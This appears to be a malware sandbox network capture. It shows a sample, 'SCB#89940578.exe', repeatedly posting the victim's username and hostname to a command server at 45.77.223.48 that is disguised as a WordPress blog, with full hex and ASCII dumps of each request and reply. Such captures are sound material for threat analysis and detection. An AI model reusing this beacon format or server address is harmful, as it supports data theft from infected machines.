                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:19.798770905 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:19.798825979 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.44975345.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:20.116741896 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:20.305181980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:21.274584055 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:20 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:21.274991035 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:21.275083065 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:21.285012007 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:21.285587072 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:21.285692930 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:21.285736084 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:21.285875082 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:21.285902023 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:21.286083937 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.44975445.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:21.613500118 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:21.800147057 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:22.861709118 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:21 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:22.861901999 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:42:22.861953974 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:22.862129927 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:22.869213104 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:22.869570017 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:22.869750977 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:22.869832039 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:22.870012999 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:22.870075941 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.44975545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:23.188582897 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:23.375848055 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:24.372457981 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:23 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:24.372570038 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:24.372946024 CEST5INData Raw: 55 54 46 2d 38
                                            Data Ascii: UTF-8
                                            Apr 26, 2024 04:42:24.373023033 CEST6INData Raw: 22 20 2f 3e 0a 09
                                            Data Ascii: " />
                                            Apr 26, 2024 04:42:24.373349905 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:24.391850948 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:24.398499012 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:24.398801088 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:24.398905039 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:24.399126053 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.44975645.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:24.705957890 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:24.893776894 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:25.840161085 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:24 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:25.840221882 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:25.840321064 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:25.850430012 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:25.850716114 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:42:25.850928068 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:25.851033926 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:42:25.851181984 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:42:25.851278067 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:42:25.851353884 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.44975745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:42:26.179564953 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:42:26.369642973 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:42:27.333605051 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:42:26 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:42:27.334165096 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                            Data Ascii: <!DOCTYPE html><html
                                            Apr 26, 2024 04:42:27.334176064 CEST37INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:42:27.334336996 CEST5INData Raw: 55 54 46 2d 38
                                            Data Ascii: UTF-8
                                            Apr 26, 2024 04:42:27.334420919 CEST6INData Raw: 22 20 2f 3e 0a 09
                                            Data Ascii: " />
                                            Apr 26, 2024 04:42:27.334600925 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:42:27.348891020 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:42:27.349037886 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                            Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:42:27.349114895 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
